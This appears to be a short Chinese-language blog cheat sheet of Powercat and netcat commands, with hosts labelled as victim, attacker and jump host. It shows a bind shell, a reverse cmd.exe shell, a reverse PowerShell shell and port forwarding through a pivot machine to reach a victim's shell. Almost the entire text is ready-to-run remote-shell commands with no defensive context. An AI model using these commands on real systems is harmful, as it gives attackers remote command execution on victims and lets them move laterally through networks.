一、正向连接
//windows7下执行(受害机)
Powercat -l -p 8080 -e cmd.exe -v
//kali下执行(攻击机)
nc 192.168.227.161 8080 -vv
二、反向连接
//windows7下执行(受害机)
Powercat -c 192.168.227.129 -p 8080 -e cmd.exe -v
//kali下执行(攻击机)
nc -l -p 8080 -vv
三、Windows反向连接
//windows2008下执行(受害机)
Powercat -c 192.168.130.150 -p 8080 -ep -v
//windows7下执行(攻击机)
Powercat -l -p 8080 -v
四、端口转发
//受害机(192.168.130.100)
Powercat -l -v -p 9999 -e cmd.exe
//跳板机(192.168.227.161)
Powercat -l -v -p 8000 -r tcp:192.168.130.100:9999
//攻击机
nc 192.168.227.161 8000 -vv
浙公网安备 33010602011771号